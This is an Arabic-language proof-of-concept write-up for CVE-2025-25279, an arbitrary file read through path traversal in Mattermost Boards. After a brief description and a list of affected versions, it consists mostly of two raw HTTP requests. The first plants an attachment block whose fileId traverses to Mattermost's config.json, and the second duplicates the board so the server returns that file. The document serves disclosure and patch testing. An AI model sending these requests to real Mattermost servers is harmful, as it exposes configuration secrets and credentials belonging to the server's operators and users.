
إثبات المفهوم لـ CVE-2025-25279: اجتياز المسار في Mattermost Boards يسمح بقراءة ملفات عشوائية عبر أرشيف استيراد مُصمَّم وتكرار لوحة.
بعد رفع ملف إلى Mattermost Boards، عندما يتم تعديل معامل fileId ونسخ اللوحة، يشير الملف الآن إلى الملف الهدف المحدد في المعامل ويقوم بتنزيله.
الإصدارات المتأثرة: حالات Mattermost مع تفعيل Boards CVE: CVE-2025-25279
تفشل إصدارات Mattermost 10.4.x <= 10.4.1 و9.11.x <= 9.11.7 و10.3.x <= 10.3.2 و10.2.x <= 10.2.2 في التحقق بشكل صحيح من كتل اللوحة عند استيراد اللوحات، مما يسمح للمهاجم بقراءة أي ملف عشوائي على النظام عبر استيراد وتصدير أرشيف استيراد مصمم خصيصًا في Boards.

POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks HTTP/1.1
Host: localhost:8065
Content-Length: 403
Authorization:
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive
[{"id":"7gni7t3q3gj6unkq49mpb3xzdre","schema":1,"boardId":"bqgcxem5wo3ncfxkbfn5rkawxcr","parentId":"crc1qdykm1pg4mbfpct45qnyorw","createdBy":"","modifiedBy":"","type":"attachment","fields":{"fileId":"../../../../../../../mattermost/config/config.json"},"title":"CVE-2025-25279.txt","createAt":1740423098470,"updateAt":1740423098470,"deleteAt":0,"limited":false,"isUploading":false,"uploadingPercent":0}]
POST /plugins/focalboard/api/v2/boards/bqgcxem5wo3ncfxkbfn5rkawxcr/blocks/crc1qdykm1pg4mbfpct45qnyorw/duplicate?asTemplate=false HTTP/1.1
Host: localhost:8065
Content-Length: 0
Authorization:
Accept-Language: en-US,en;q=0.9
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Accept: application/json
Content-Type: application/json
Origin: http://localhost:8065
Connection: keep-alive
الفضل ليس لي، يتضمن مراجعة